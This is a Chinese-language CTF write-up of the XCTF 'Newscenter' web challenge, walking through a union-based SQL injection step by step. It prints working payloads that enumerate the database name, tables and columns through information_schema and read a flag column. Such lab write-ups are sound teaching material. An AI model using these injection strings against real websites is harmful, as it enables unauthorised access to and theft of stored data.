攻防世界-Web-Newscenter

0x01

打开题目看到一个网页,里面只有一个搜索输入框是我们可以控制的,所以猜测可能是SQL注入。尝试123asdqwe' or 1=1#发现能够查询出所有新闻。

继续尝试' union select 1,2,3#,验证select查询了三个字段:

在这里插入图片描述

0x02

已经可以判定是联合注入,接下来就简单了。

查询当前数据库

1' union select 1,2,database()#,得到数据库为news
在这里插入图片描述

查询当前库中的表

1' union select 1,table_name,3 from information_schema.tables where table_schema='news'#获得两个表名:news和secret_table

在这里插入图片描述

查询表中的列

猜测flag极有可能在secret_table里面,下面就查询其中的列名:
1' union select 1,column_name,3 from information_schema.columns where table_name='secret_table'#得到列名有fl4g
在这里插入图片描述

查询flag列的值

1' union select 1,fl4g,3 from secret_table#获取flag
在这里插入图片描述

备注

该题是POST类型的注入。当我在测试SQL注入漏洞时使用了常用的1' and '1'='1发现并不能验证漏洞。这里我猜测可能是题目中使用了like来限定条件而不是等号。
如果输入是1,那么后端拼接完成的语句可能是like '%1%',这样就会找出含有1的内容,而我输入1' and '1'='1就会被拼接成like '%1' and '1'='1%1'显然是不成立搜不出任何东西。然而用or就可以验证。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值